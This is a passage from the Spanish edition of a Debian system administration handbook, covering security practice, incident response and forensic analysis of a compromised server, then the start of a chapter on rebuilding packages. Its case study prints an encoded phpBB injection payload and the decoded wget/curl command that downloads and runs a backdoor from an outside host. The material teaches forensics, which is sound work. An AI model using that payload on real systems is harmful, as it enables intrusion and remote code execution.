sitios  web,  como  SecurityFocus.com,  mantienen  una  lista  de  vulnerabilidades  descubiertas  re- 
cientemente,  lo  cual  le  puede  dar  una  idea  del  historial  de  seguridad  de  un  software  antes  de 
desplegarlo.  Por  supuesto,  debe  balancear  esta  informacion  con  la  popularidad  de  dicho  soft¬ 
ware:  un  programa  mas  utilizado  es  un  objetivo  mas  tentador  y,  consecuentemente,  sera  inves- 
tigado  mas  en  detalle.  Por  el  otro  lado,  un  programa  de  nicho  podria  estar  lleno  de  huecos  de 
seguridad  que  nunca  son  publicados  debido  a  la  falta  de  interes  en  una  auditoria  de  seguridad. 


VOCABULARIO  Una  auditoria  de  seguridad  es  el  proceso  de  leer  y  analizar  a  fondo  el  codigo  fuente 
Auditoria  de  seguridad  de  ^gun  software,  buscando  potenciales  vulnerabilidades  de  seguridad  que  pue¬ 
da  contener.  Usualmente,  dichas  auditorias  son  proactivas  y  se  las  realizan  para 
asegurar  que  un  programa  cumple  ciertos  requisitos  de  seguridad. 


En  el  mundo  del  Software  Libre,  generalmente  hay  mucha  variedad  de  opciones  y  elegir  un  soft¬ 
ware  sobre  otro  deberia  ser  una  decision  basada  en  el  criterio  local.  Mas  funcionalidad  implica 
un  aumento  del  riesgo  de  una  vulnerabilidad  escondida  en  el  codigo;  elegir  el  programa  mas 
avanzado  para  una  tarea  podria  ser  contraproducente,  usualmente  elegir  el  programa  mas  sim¬ 
ple  que  cumpla  los  requisitos  es  un  mejor  enfoque. 
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VOCABULARIO  Un  ataque  mediante  una  vulnerabilidad de  di'a  ceroe s  dificil  de  prevenir;  el  termino 
Vulnerabilidad  de  dia  abarca  una  vulnerabilidad  que  todavi'a  no  es  conocida  por  los  autores  del  programa. 

cero  («zero-day  exploit») 


14.6.4.  Gestion  de  una  maquina  como  un  todo 

La  mayoiia  de  las  distribuciones  Linux  instalan  de  forma  predeterminada  una  cantidad  de  servi- 
cios  Unix  y  muchas  herramientas.  En  muchos  casos,  no  son  necesarios  para  el  funcionamiento 
adecuado  de  los  servicios  configurados  por  el  administrador  en  la  maquina.  Como  guia  general 
en  materia  de  seguridad,  es  mejor  desinstalar  todo  el  software  innecesario.  En  efecto,  no  tie- 
ne  sentido  asegurar  un  servidor  FTP  si  se  puede  utilizar  una  vulnerabilidad  en  otro  servicio  no 
utilizado  para  obtener  permisos  de  administrador  en  todo  el  equipo. 

De  la  misma  forma,  generalmente  se  configuraran  los  firewalls  solo  para  permitir  acceder  a  los 
servicios  que  deban  estar  accesibles  publicamente. 

Los  equipos  actuales  son  suficientemente  potentes  para  poder  albergar  varios  servicios  en  la 
misma  maquina  fisica.  Desde  un  punto  de  vista  economico,  dicha  posibilidad  es  interesante:  un 
solo  equipo  a  administrar,  menor  consumo  de  energfa,  etc.  Desde  el  punto  de  vista  de  seguridad, 
sin  embargo,  esta  eleccion  puede  ser  un  problema.  Un  servicio  comprometido  puede  proveer 
acceso  a  toda  la  maquina,  que  a  su  vez  compromete  los  otros  servicios  en  el  mismo  equipo.  Se 
puede  mitigar  este  riesgo  aislando  los  servicios.  Puede  lograrlo  mediante  virtualizacion  (cada 
servicio  albergado  en  una  maquina  virtual  o  contenedor  dedicado)  o  bien  con  AppArmor/SELi- 
nux  (que  cada  demonio  de  servicio  tenga  un  conjunto  de  permisos  adecuado). 


14.6.5.  Los  usuarios  tambien  son  parte 

Discutir  sobre  seguridad  inmediatamente  trae  a  la  mente  proteger  en  contra  de  ataques  de  «crac- 
ker»  anonimos  escondidos  en  la  jungla  de  Internet;  pero  se  suele  olvidar  que  el  riesgo  tambien 
proviene  desde  adentro:  un  empleado  a  punto  de  dejar  la  empresa  podria  descargar  archivos 
sensibles  en  un  proyecto  importante  y  venderlos  a  la  competencia,  un  vendedor  descuidado  po¬ 
dria  dejar  su  escritorio  sin  bloquear  su  sesion  durante  una  reunion  con  un  nuevo  prospecto,  un 
usuario  atolondrado  podria  borrar  el  directorio  incorrecto  por  error,  etc. 

La  respuesta  a  estos  riesgos  puede  involucrar  soluciones  tecnicas:  limitar  los  permisos  otorgados 
a  los  usuarios  a  aquellos  estrictamente  necesarios  y  tener  respaldos  son  obligatorios.  Pero  en 
muchos  casos  la  proteccion  adecuada  involucrara  entrenar  a  los  usuarios  a  evitar  los  riesgos. 


VISTA  RAPIDA  El  paquete  autolog  provee  un  programa  que  automaticamente  desconecta  usua- 
autolog  r'os  inactivos  luego  de  un  tiempo  configurable.  Tambien  permite  matar  procesos 
de  usuarios  que  permanecen  despues  que  finalizo  su  sesion,  evitando  asf  que  los 
usuarios  ejecuten  demonios. 


436 


El  manual  del  Administrador  de  Debian 


14.6.6.  Seguridad  ffsica 


No  tiene  sentido  asegurar  redes  y  servicios  si  los  equipos  en  si  no  estan  protegidos.  Los  datos 
importantes  merecen  estar  almacenados  en  disco  duros  que  puede  cambiar  en  caliente  en  arrays 
RAID,  porque  los  discos  duros  eventualmente  fallan  y  la  disponibilidad  de  los  datos  es  necesaria. 
Pero  si  cualquier  repartidor  de  pizza  puede  ingresar  al  edificio,  ingresar  a  la  sala  de  servidores 
y  huir  con  unos  pocos  discos  duros  especificos,  no  se  cumple  una  parte  de  la  seguridad.  ^Quien 
puede  ingresar  a  la  sala  de  servidores?  ^Esta  monitorizado  el  acceso?  Estas  cuestiones  merecen 
ser  consideradas  (y  respondidas)  cuando  se  evalua  la  seguridad  ffsica. 

La  seguridad  ffsica  tambien  incluye  tener  en  cuenta  los  riesgos  de  accidentes,  como  incendios. 
Este  riesgo  particular  es  lo  que  justifica  medios  de  respaldo  en  edificios  separados,  o  al  menos 
en  una  caja  de  seguridad  a  prueba  de  incendios. 


14.6.7.  Responsabilidad  legal 


De  formas  mas  o  menos  implfcita,  un  administrador  recibe  la  confianza  de  sus  usuarios  asf  como 
tambien  la  de  los  usuarios  de  la  red  en  general.  Por  lo  tanto,  deberfan  evitar  cualquier  descuido 
que  pueda  ser  aprovechado  por  gente  con  malas  intenciones. 

Un  atacante  que  tome  control  de  su  equipo  y  luego  lo  utilice  como  una  base  avanzada  (conocido 
como  «sistema  de  retransmision»)  desde  la  que  realizar  otras  actividades  nefastas  podrfa  causar- 
le  problemas  legales,  debido  a  que  aquellos  atacados  inicialmente  verfan  que  el  ataque  proviene 
de  su  sistema  y,  por  lo  tanto,  considerarlo  como  el  atacante  (o  un  complice).  En  muchos  casos, 
el  atacante  utilizara  su  servidor  para  enviar  spam,  lo  que  no  deberfa  tener  demasiado  impac- 
to  (excepto  la  posibilidad  de  registrarlo  en  listas  negras  que  limitarfan  su  capacidad  de  enviar 
correos  legftimos),  pero  no  sera  agradable.  En  otros  casos,  puede  causar  problemas  mas  impor¬ 
tantes  desde  su  maquina,  por  ejemplo  ataques  de  denegacion  de  servicio.  Esto  a  veces  generara 
perdida  de  ingresos  ya  que  los  servicios  legftimos  no  estaran  disponibles  y  podrfa  destruir  datos; 
a  veces  esto  tambien  implicara  costos  reales,  ya  que  la  parte  atacada  puede  iniciar  procedimien- 
tos  legales  en  su  contra.  Los  titulares  de  los  derechos  pueden  enjuiciarlo  si  se  comparte  desde  su 
servidor  una  copia  no  autorizada  de  una  obra  protegida  por  la  legislacion  de  derechos  de  copia, 
asf  como  tambien  otras  empresas,  obligadas  por  acuerdos  de  nivel  de  servicio,  si  deben  pagar 
penalidades  por  el  ataque  desde  su  maquina. 

Cuando  ocurren  estas  situaciones,  usualmente  no  basta  con  alegar  inocencia;  cuando  menos 
necesitara  evidencia  convincente  que  muestre  actividad  sospechosa  en  su  sistema  que  proviene 
de  una  direccion  IP  dada.  Esto  no  sera  posible  si  descuida  las  recomendaciones  de  este  capftulo 
y  deja  que  el  atacante  obtenga  acceso  a  una  cuenta  privilegiada  (root  en  particular)  y  la  utilice 
para  cubrir  sus  huellas. 


Capftulo  14  —  Seguridad 


437 


14.7.  Tratamiento  de  una  maquina  comprometida 

A  pesar  de  las  mejores  intenciones  y  sin  importar  cuan  cuidadosamente  disene  la  politica  de 
seguridad,  un  administrador  eventualmente  se  enfrentara  a  un  secuestro.  Esta  section  provee 
algunas  directrices  sobre  como  reaccionar  frente  a  estas  circunstancias  desafortunadas. 


14.7.1.  Detection  y  visualization  de  la  intrusion 

El  primer  paso  de  la  reaction  frente  a  una  intrusion  es  estar  al  tanto  de  la  misma.  Esto  no  es 
siempre  obvio,  especialmente  sin  una  infraestructura  de  monitorizacion  adecuada. 

A  veces  no  se  detectan  los  actos  de  intrusion  hasta  que  tienen  consecuencias  directas  en  los  ser¬ 
vices  legftimos  albergados  en  la  maquina,  como  lentitud  en  las  conexiones,  algunos  usuarios 
no  se  pueden  conectar  o  cualquier  otro  tipo  de  funcionamiento  defectuoso.  El  administrador 
que  se  enfrenta  a  estos  problemas  debe  revisar  cuidadosamente  la  maquina  y  escrutar  en  de- 
talle  aquello  que  no  funciona  como  corresponde.  Generalmente  este  es  el  momento  en  el  que 
descubren  un  proceso  inusual,  por  ejemplo  uno  llamado  apache  en  lugar  del  estandar  /usr/sbin/ 
apache2.  Si  seguimos  con  dicho  ejemplo,  debemos  anotar  el  identificador  de  proceso  y  revisar 
/pro c/pid/exe  para  ver  que  programa  esta  ejecutando  dicho  proceso: 

#  Is  -al  /proc/3719/exe 

Irwxrwxrwx  1  www-data  www-data  0  2007-04-20  16:19  /proc/3719/exe  ->  /var/tmp/. 
bashhttpd/psybnc 

^Un  programa  instalado  en  /va  r/tmp/  que  ejecuta  como  el  servidor  web?  Sin  duda  la  maquina 
esta  comprometida. 

Este  solo  es  un  ejemplo,  pero  muchas  otras  pistas  pueden  encender  la  lampara  del  administra¬ 
dor: 


■  una  option  a  un  programa  que  ya  no  funciona;  la  version  del  software  que  el  programa 
dice  ser  no  coincide  con  la  version  que  se  supone  esta  instalada  segun  dpkg; 

■  un  prompt  de  ordenes  o  mensaje  de  sesion  que  indica  que  la  ultima  conexion  provino  de 
un  servidor  desconocido  en  otro  continente; 

■  errores  causados  porque  la  partition  /tmp/  esta  llena,  resultado  de  multiples  copias  ilega- 
les  de  peliculas; 

■  etc. 


14.7.2.  Desconexion  del  servidor 

En  practicamente  todos  los  casos,  la  intrusion  proviene  de  la  red  y  el  atacante  necesita  una 
red  funcional  para  alcanzar  sus  objetivos  (acceder  a  datos  confidenciales,  compartir  archivos 
ilegales,  esconder  su  identidad  utilizando  la  maquina  como  restransmisor,  etc.).  Desconectar  el 
equipo  de  la  red  evitara  que  el  atacante  logre  estos  objetivos  si  es  que  no  los  alcanzo  para  ese 
momento. 
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Esto  podrfa  ser  posible  solamente  si  puede  acceder  fisicamente  al  servidor.  Cuando  se  alberga 
el  servidor  en  un  centro  de  datos  en  la  otra  punta  del  pais,  o  si  no  puede  acceder  al  servidor 
de  niguna  otra  forma,  usualmente  es  buena  idea  comenzar  a  obtener  informacion  importante 
(vea  Seccion  14.7.3,  «Preservacion  de  todo  lo  que  pueda  utilizar  como  evidencia»  pagina  439, 
Seccion  14.7.5,  «Analisis  forense»  pagina  440  y  Seccion  14.7.6,  «Reconstruccion  del  escenario  de 
ataque»  pagina  441),  luego  aislar  el  servidor  tanto  como  sea  posible  apagando  tantos  servicios 
como  pueda  (generalmente,  todo  excepto  sshd).  Este  caso  sigue  siendo  incomodo  ya  que  no  se 
puede  descartar  la  posibilidad  que  el  atacante  tenga  acceso  SSH  al  igual  que  el  administrador; 
esto  dificulta  «limpiar»  las  maquinas. 


14.7.3.  Preservacion  de  todo  lo  que  pueda  utilizar  como  evidencia 

Entender  el  ataque  y/ o  establecer  una  accion  legal  en  contra  del  atacante  requerira  copias  de 
todos  los  elementos  importantes;  esto  incluye  el  contenido  de  los  discos,  una  lista  de  todos  los 
procesos  en  ejecucion  y  las  conexiones  establecidas.  Incluso  podrfa  utilizar  el  contenido  de  la 
RAM  pero,  rara  vez  se  lo  utiliza  realmente. 

En  el  apice  de  la  accion,  los  administradores  generalmente  estan  tentados  de  realizar  muchas 
verificaciones  en  la  maquina  comprometida;  generalmente  esto  no  es  una  buena  idea.  Potencial- 
mente,  todo  programa  esta  comprometido  y  puede  borrar  porciones  de  la  evidencia.  Deberia 
restringir  las  verificaciones  a  un  conjunto  minimo  (netstat  -tupan  para  conexiones  de  red, 
ps  auxf  para  una  lista  de  procesos,  Is  -air  /p roc/ [0-9] *  para  un  poco  mas  de  informacion 
sobre  los  programas  en  ejecucion),  y  debe  anotar  cuidadosamente  cada  verificacion  que  realice. 


PRECAUCION  Puede  parecer  tentandor  analizar  el  equipo  mientras  ejecuta,  especialmente  cuan- 
Analisis  en  caliente  do  no  Puede  acceder  fisicamente  al  servidor;  debe  evitarlo:  simplemente  no  puede 
confiar  en  los  programas  instalados  actualmente  en  el  sistema  comprometido.  Es 
muy  probable  que  un  programa  ps  comprometido  esconda  proceso,  o  que  un  Is 
comprometido  esconda  archivos.  jA  veces  incluso  el  nucleo  esta  comprometido! 

Si  necesita  dicho  analisis  en  caliente,  debe  tener  cuidado  de  solo  utilizar  programas 
en  los  que  sabe  que  puede  confiar.  Una  buena  forma  de  hacer  esto  seria  tener  un  CD 
de  rescate  con  programas  impolutos,  o  un  espacio  de  red  compartido  en  modo  de 
solo  lectura.  Sin  embargo,  aun  estas  medidas  pueden  no  ser  suficientes  si  el  nucleo 
en  si  fue  comprometido. 


Una  vez  que  guardo  los  elementos  «dinamicos»,  el  siguiente  paso  es  almacenar  una  imagen  com- 
pleta  del  disco  duro.  Realizar  dicha  imagen  es  imposible  si  el  sistema  de  archivos  continua  evo- 
lucionando,  razon  por  la  que  debe  volver  a  montarlo  en  modo  solo  de  lectura.  La  solucion  mas 
simple  generalmente  es  detener  brutalmente  el  servidor  (luego  de  ejecutar  sync)  y  luego  reini- 
ciar  desde  un  CD  de  rescate.  Debe  copiar  cada  particion  con  una  herramienta  como  dd;  luego 
puede  enviar  estas  imagenes  a  otro  servidor  (posiblemente  con  la  conveniente  herramienta  nc). 
Otra  posiblidad  que  puede  ser  aun  mas  sencilla:  simplemente  quite  el  disco  de  la  maquina  y 
reemplacelo  con  otro  al  que  pueda  dar  formato  y  reinstalar. 
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14.7.4.  Reinstalacion 


No  deberfa  volver  a  poner  en  lfnea  al  servidor  sin  reinstalarlo  completamente.  Si  el  compro¬ 
mise  fue  serio  (obtuvieron  permisos  de  administrador),  practicamente  no  existe  otra  forma  de 
estar  seguro  que  se  ha  eliminado  todo  lo  que  el  atacante  podria  haber  dejado  ( puertas  traseras 
—  «backdoors»  —  en  particular).  Por  supuesto,  tambien  debe  aplicar  todas  las  ultimas  actuali- 
zaciones  de  seguridad  para  solucionar  la  vulnerabilidad  que  utilizo  el  atacante.  Idealmente,  el 
analisis  del  ataque  deberfa  indicarle  dicho  vector  de  ataque  para  que  pueda  estar  seguro  de  so- 
lucionarlo;  de  lo  contrario,  solo  puede  confiar  que  alguna  de  las  actualizaciones  hay  corregido 
la  vulnerabilidad. 

No  siempre  es  sencillo  reinstalar  un  servidor  remoto;  podria  involucrar  asistencia  de  la  empresa 
que  alberga  su  equipo,  ya  que  no  siempre  dichas  companfas  ofrecen  servicios  automatizados  de 
reinstalacion.  Debe  tener  cuidado  de  no  reinstalar  la  maquina  desde  respaldos  realizados  luego 
del  ataque.  Idealmente,  solo  deberfa  restaurar  los  datos,  deberfa  instalar  el  software  en  sf  desde 
los  medios  de  instalacion. 


14.7.5.  Analisis  forense 

Ahora  que  restauro  el  servicio,  es  momento  de  revisar  mas  cuidadosamente  las  imagenes  de 
disco  del  sistema  comprometido  para  poder  entender  el  vector  de  ataque.  Cuando  monte  estas 
imagenes  debe  asegurarse  de  utilizar  las  opciones  ro,nodev,noexec,noatime  para  evitar  modifi- 
car  sus  contenidos  (incluyendo  las  marcas  temporales  de  acceso  de  los  archivos)  o  ejecutar  por 
error  los  programas  comprometidos. 

Seguir  las  huellas  de  un  escenario  de  ataque  generalmente  involucra  buscar  todo  lo  que  se  mo¬ 
dified  o  ejecuto: 

■  usualmente  es  interesante  leer  los  archivos  .  bash_histo  ry; 

■  al  igual  que  enumerar  los  archivos  que  fueron  creados,  modificados  o  accedidos  reciente- 
mente; 

■  el  programa  st  rings  ayuda  a  identificar  los  programas  instalados  por  el  atacante,  extra- 
yendo  las  cadenas  de  texto  de  un  binario; 

■  los  archivos  de  registro  en  /var/log/  usualmente  permiten  reconstruir  una  cronologfa 
de  los  eventos; 

■  herramientas  especfficas  tambien  permiten  restaurar  el  contenido  de  archivos  potencial- 
mente  borrados,  incluyendo  los  archivos  de  registro  que  generalmente  borran  los  atacan- 
tes. 

Algunas  de  estas  operaciones  pueden  simplificarse  mediante  programas  especializados.  En  par¬ 
ticular,  el  paquete  sleuthkit  proprociona  muchas  herramientas  para  analizar  un  sistema  de  archi¬ 
vos.  Es  mas  sencillo  utilizarlo  con  la  interfaz  grafica  Autopsy  Forensic  Browser  («navegador  forense 
de  autopsias»,  en  el  paquete  autopsy ). 
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14.7.6.  Reconstruction  del  escenario  de  ataque 


Todos  los  elementos  recolectados  durante  el  analisis  deberian  encajar  como  piezas  de  un  rompe- 
cabezas;  usualmente  hay  una  correlation  entre  la  creadon  de  los  primeros  archivos  sospechosos 
con  los  registros  que  muestran  la  intrusion.  Un  ejemplo  real  deberia  ser  mas  explicito  que  largos 
desvarios  teoricos. 

El  siguiente  registro  es  un  extracto  de  un  archivo  access .  log  de  Apache: 


www.falcot.com  200.58.141.84  -  -  [27/Nov/2004: 13:33:34  +0100]  "GET  /phpbb/viewtopic . 
php?t=10&highlight=%2527%252esystem(chr(99)  %252ech r(  100)  %252echr(32)  %252echr 
**•  (47)  %252echr(116)  %252echr(109)  %252echr(112)  %252echr(59)  %252echr(32)  %252echr 
**•  (119)  %252echr(103)  %252ech r(  101)  %252echr(  116)  %252echr(32)  %252echr(  103)  %252echr 
*+■  (97)  %252echr(98)  %252echr(  114)  %252echr(121)  %252echr(107)  %252echr(46)  %252echr 
(97)  %252echr(108)  %252echr(116)  %252echr(101)  %252ech r(  114)  %252echr(  118)  %252echr 
*+■  (105)  %252echr(115)  %252ech r(  116)  %252echr(97)  %252echr(46)  %252echr(lll)  %252echr 
*+■  (114)  %252echr(103)  %252echr(47)  %252echr(98)  %252echr(100)  %252echr(32)  %252echr 
*+■  (124)  %252echr(124)  %252echr(32)  %252echr(99)  %252echr(117)  %252echr(114)  %252echr 
(108)  %252echr(32)  %252echr(103)  %252echr(97)  %252echr(98)  %252echr(114)  %252echr 
**•  (121)  %252echr(107)  %252echr(46)  %252echr(97)  %252echr(108)  %252echr(116)  %252echr 
(101)  %252echr(114)  %252ech r( 118)  %252echr( 105)  %252echr( 115)  %252echr(116) %252echr 
**•  (97)  %252echr(46)  %252echr( 111)  %252echr(114)  %252echr(103)  %252echr(47)  %252echr 
**•  (98)  %252echr(100)  %252echr(32)  %252echr(45)  %252echr(  111)  %252echr(32)  %252echr(98) 
%252echr( 100) %252echr(59)  %252echr(32)  %252echr(99)  %252ech r( 104)  %252ech r( 109) 

*+■  %252echr(  111)  %252echr(100)  %252echr(32)  %252echr(43)  %252echr(  120)  %252echr(32) 
%252echr(98)  %252echr(  100)  %252echr(59)  %252echr(32)  %252echr(46)  %252echr(47)  %252 
echr(98)  %252echr(100)  %252echr(32)  %252echr(38) )  %252e%2527  HTTP/1.1"  200  27969 
*+■  "Mozilla/4.0  (compatible;  MSIE  6.0;  Windows  NT  5.1)" 


Este  ejemplo  coincide  con  el  aprovechamiento  de  una  antigua  vulnerabilidad  de  phpBB. 
http ://secunia . com/ad visories/13239/ 
http ://www. phpbb. com/phpBB/viewtopic . php?t=240636 

Decodificar  esta  URL  lleva  a  entender  que  el  atacante  logro  ej  ecu  tar  un  codigo  PHP,  en 
particular:  system ("cd  /tmp;wget  gabryk.altervista.org/bd  ||  curl  gabryk.altervi 
sta.org/bd  -o  bd;chmod  +x  bd;./bd  &").  En  efecto,  encontramos  un  archivo  bd  en /tmp/. 
La  ejecucion  de  strings  /mnt/tmp/bd  devuelve,  entre  otras  cadenas,  PsychoPhobia  Backdoor 
is  starting....  Esto  realmente  parece  una  puerta  trasera. 

Un  tiempo  despues,  se  utilizo  este  acceso  para  descargar,  instalar  y  ejecutar  un  hot  IRC  que  se 
conecto  a  una  red  IRC  clandestina.  Luego  se  podia  controlar  el  bot  mediante  este  protocolo  y 
ordenarle  descargar  archivos  para  compartir.  Este  programa  inclusive  tiene  su  propio  archivo 
de  registro: 
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**  2004-11-29-19:50:15:  NOTICE:  : GAB ! sex@Rizon -2EDFBC28 . pool8250 . interbusiness . it 
*+■  NOTICE  ReV|DivXNeW|504  :DCC  Chat  (82.50.72.202) 

**  2004-11-29-19:50:15:  DCC  CHAT  attempt  authorized  from  GAB!SEX@RIZ0N-2EDFBC28. 

*+■  POOL8250.INTERBUSINESS.IT 

**  2004-11-29-19:50:15:  DCC  CHAT  received  from  GAB,  attempting  connection  to 
*+■  82.50.72.202:1024 

**  2004-11-29-19:50:15:  DCC  CHAT  connection  suceeded,  authenticating 
**  2004-11-29-19:50:20:  DCC  CHAT  Correct  password 

(...) 

**  2004-11-29-19:50:49:  DCC  Send  Accepted  from  ReV | DivXNeW| 502 :  In . Ostaggio-iTa . Oper 
-DvdScr.avi  (713034KB) 

(...) 

**  2004-11-29-20:10:11:  DCC  Send  Accepted  from  GAB:  La  tela_dell_assassino.avi 
(666615KB) 

(■  ■  ■) 

**  2004-11-29-21:10:36:  DCC  Upload:  Transfer  Completed  (666615  KB,  1  hr  24  sec,  183.9 
KB/sec) 

(...) 

**  2004-11-29-22:18:57:  DCC  Upload:  Transfer  Completed  (713034  KB,  2  hr  28  min  7  sec, 
*+■  80.2  KB/sec) 

Estas  trazas  muestran  que  se  almacenaron  dos  archivos  de  video  en  el  servidor  desde  la  direccion 
IP  82.50.72.202. 

En  paralelo,  el  atacante  tambien  descargo  un  par  de  archivos  adicionales,  /tmp/pt  y  /tmp/ 
loginx.  Ejecutar  strings  enestos  archivos  nos  provee  cadenas  como  Shellcode  placed  at  Ox  %08lx 
(«codigo  de  consolaubicado  en  0x%08lx»)y  Now  wait  for  suid  shell...  («esperando  consola  suid...»). 
Estos  parecen  programas  que  aprovechan  vulnerabilidades  locales  para  obtener  privilegios  de 
administrador.  ^Consiguieron  su  objetivo?  En  este  caso,  probablemente  no,  ya  que  no  parecen 
existir  archivos  modificados  luego  de  la  intrusion  original. 

En  este  ejemplo,  se  reconstruyo  la  intrusion  completa  y  podemos  deducir  que  el  atacante  pudo 
aprovechar  el  sistema  comprometido  por  alrededor  de  tres  dias;  pero  el  elemento  mas  impor- 
tante  del  analisis  es  que  se  identified  la  vulnerabilidad  y  el  administrador  puede  asegurarse  que 
la  nueva  instalacion  realmente  soluciona  la  vulnerabilidad. 
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Es  muy  comun  para  un  administrador  Debian  que  gestiona  diariamente  paquetes  Debian  finalmente 
sentir  la  necesidad  de  crear  sus  propios  paquetes  o  modificar  un  paquete  existente.  Este  capitulo  pretende 
dar  respuesta  a  las  preguntas  mas  comunes  en  este  campo  y  proporcionar  los  elementos  necesarios  para 
aprovechar  lo  mejor  posible  la  infraestructura  de  Debian.  Con  un  poco  de  suerte,  despues  de  probar  con 
paquetes  locales,  incluso  puede  sentir  la  necesidad  de  ir  mas  allay  junirse  al  proyecto  Debian  en  si! 


15.1.  Recompilacion  de  un  paquete  desde  sus  fuentes 

Son  varias  las  cirunstancias  bajo  las  que  es  necesario  reconstruir  un  paquete  binario.  En  algunos 
casos,  el  administrador  necesita  una  funcionalidad  del  software  para  la  que  necesitara  compi- 
larlo  desde  sus  fuentes  con  alguna  opcion  de  compilacion  particular;  en  otras,  el  software  empa- 
quetado  para  la  version  de  Debian  instalada  no  es  suficientemente  reciente.  En  el  ultimo  caso,  el 
administrador  generalmente  compilara  un  paquete  mas  reciente  que  obtendra  de  una  version 
mas  reciente  de  Debian  —  como  Testing  o  inclusive  Unstable  —  para  que  este  nuevo  paquete  fun- 
cione  con  su  distribution  Stable;  esta  operacion  es  llamada  «retroadaptacion»  («backporting»). 
Como  siempre,  antes  de  embarcarse  en  esta  tarea,  se  debe  revisar  si  no  fue  hechaya  —  un  repaso 
rapido  al  gestor  de  seguimiento  de  paquetes  Debian  mostrara  esta  informacion. 

•-  https : //tracker .debian . org/ 


15.1.1.  Obtencion  de  las  fuentes 

Lo  primero  para  recompilar  un  paquete  Debian  es  obtener  su  codigo  fuente.  La  forma  mas  senci- 
11a  esutilizando  apt -get  source  nombre-paquete-  fuente.  Para  ello  necesitara  una  lineadeb- 
src  en  el  archivo  /etc/apt/sources  .  list  y  archivos  de  mdice  actualizados  (es  decir:  apt -get 
update).  Si  siguio  las  instrucciones  en  el  capitulo  sobre  la  configuration  de  APT  (revise  la  Sec- 
cion  6.1,  «Contenido  del  archivo  sou  rces  .  list»  pagina  106)  deberia  cumplir  estas  condiciones. 
Sepa,  sin  embargo,  que  descargara  los  paquetes  fuente  de  la  version  Debian  mencionada  en  la 
linea  deb-src.  Si  necesita  otra  version  probablemente  necesite  descargarla  manualmente  de  un 
repositorio  Debian  o  desde  el  sitio  web.  Para  ello  debe  obtener  dos  o  tres  archivos  (con  exten- 
siones  * .  dsc  —  por  control  de  fuente  Debian:  «Debian  Source  Control))  —  * .  ta  r .  comp  y  a  veces 
*  .diff  .gz  o  *  .debian .  tar .  comp  —  donde  el  valor  de  comp  es  uno  de  gz,  bz2  o  xz  dependiendo 
de  la  herramienta  de  compresion  utilizada),  luego  ejecute  dpkg-  source  -x  archivo .  dsc.  Si 
puede  acceder  directamente  al  archivo  * .  dsc  a  traves  de  una  URL  existe  una  forma  mas  senci- 
11a  de  obtener  todo  ejecutando  dget  URL.  Este  programa  (que  puede  encontrar  en  el  paquete 
devscripts )  obtiene  el  archivo  * .  d  s  c  en  la  direccion  provista,  analiza  su  contenido  y  obtiene  au- 
tomaticamente  el  o  los  archivos  a  los  que  hace  referencia.  Una  vez  se  ha  descargado  todo,  extrae 
el  paquete  de  fuentes  (a  menos  que  se  haya  usado  la  opcion  -d  o  -download-only). 


15.1.2.  Realizacion  de  cambios 

Ahora  tiene  las  fuentes  del  paquete  disponibles  en  un  directorio  cuyo  nombre  coincide  con  el  pa¬ 
quete  fuente  y  su  version  (por  ejemplo:  samba-4.1.17+dfsg );  alh  es  donde  trabajaremos  en  nuestros 
cambios  locales. 

Lo  primero  que  debemos  hacer  es  cambiar  el  numero  de  version  del  paquete  para  que  podamos 
distinguir  el  paquete  recompilado  del  paquete  original  que  provee  Debian.  Si  asumimos  que  la 
version  actual  es  2:4.1. 1 7+dfsg-2  podemos  crear  la  version  2:4.1. 1 6+dfsg2falcot  1 ,  que  indica  clara- 
mente  el  origen  del  paquete.  Esto  ademas  hace  que  el  numero  de  version  del  paquete  sea  mayor 
al  del  que  provee  Debian  para  que  el  paquete  se  instalara  facilmente  como  una  actualization 
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al  paquete  original.  La  mejor  forma  de  realizar  dicho  cambio  es  con  el  programa  dch  (por  cam- 
bios  Debian:  «Debian  CHangelog»)  del  paquete  devscripts  ejecutando  algo  similar  a  dch  -  -  local 
f  alcot  1.  Esto  invoca  un  editor  de  texto  (sen sible- edit o  r  —  este  deberia  ser  tu  editor  favorito 
si  es  mencionado  en  las  variables  de  entorno  VISUAL  o  EDITOR  o  el  editor  predeterminado  de 
lo  contrario)  que  nos  permitira  documentar  las  diferencias  introducidas  en  esta  recompilacion. 
Este  editor  nos  mostrara  que  dch  realmente  cambio  el  archivo  debian/changelog. 

Cuando  necesitamos  cambiar  las  opciones  de  compilacion,  debemos  realizar  cambios  a  debian/ 
rules,  el  cual  se  encarga  de  todos  los  pasos  en  el  proceso  de  compilacion  del  paquete.  En  los 
casos  mas  simples,  es  sencillo  encontrar  las  lrneas  sobre  la  configuracion  inicial  (./configure  ...) 
o  la  compilacion  en  si  ($(MAKE)  ...  o  make  ...).  Si  no  se  ejecutan  especificamente  estos  progra- 
mas  probablemente  son  un  efecto  secundario  de  otra  orden  explicita,  en  cuyo  caso  refierase 
a  la  documentacion  de  las  mismas  para  aprender  como  cambiar  el  comportamiento  predeter¬ 
minado.  Con  paquetes  usando  dh,  puede  necesitar  agregar  un  reemplazo  para  los  comandos 
dh_auto_configure  o  dh_auto_build  (ver  las  paginas  de  los  respectivos  manuales  para  obte- 
ner  explicaciones  de  como  hacerlo). 

Dependiendo  de  los  cambios  locales  a  los  paquetes,  tambien  podria  necesitar  actualizar  el  ar¬ 
chivo  debian/cont  rol,  que  contiene  una  descripcion  de  los  paquetes  generados.  En  particular, 
este  paquete  contiene  lineas  Build-Depends  que  controlan  la  lista  de  dependencias  que  se  deben 
cumplir  en  el  momento  de  compilar  un  paquete.  Estas  lineas  generalmente  hacen  referencia  a 
las  versiones  de  los  paquetes  que  se  encuentran  en  la  distribucion  de  la  que  proveen  los  paquetes 
fuente  pero  que  pueden  no  estar  disponibles  en  la  distribucion  en  la  que  estamos  recompilando. 
No  hay  una  forma  automatizada  para  determinar  si  una  dependencia  es  real  o  solo  esta  presente 
para  garantizar  que  solo  se  intente  compilar  con  la  ultima  version  de  una  biblioteca  —  esta  es 
la  unica  forma  de  forzar  que  autobuilder  utilice  una  version  especifica  de  un  paquete  durante 
su  compilacion,  por  lo  que  los  desarrolladores  Debian  frecuentemente  utilizan  dependencias  de 
compilacion  con  versiones  estrictas. 

Si  esta  seguro  que  estas  dependencias  de  compilacion  son  muy  estrictas,  sientase  libre  de  rela- 
jarlas  localmente.  Lea  los  archivos  que  documentan  la  forma  estandar  de  compilar  el  software  — 
generalmente  estos  archivos  son  llamados  INSTALL  —  le  ayudaran  a  encontrar  las  dependencias 
adecuadas.  Idealmente,  podra  satisfacer  todas  las  dependencias  en  la  distribucion  que  utilice  pa¬ 
ra  recompilar;  de  lo  contrario,  comienza  un  proceso  recursivo  en  el  que  debemos  retroadaptar 
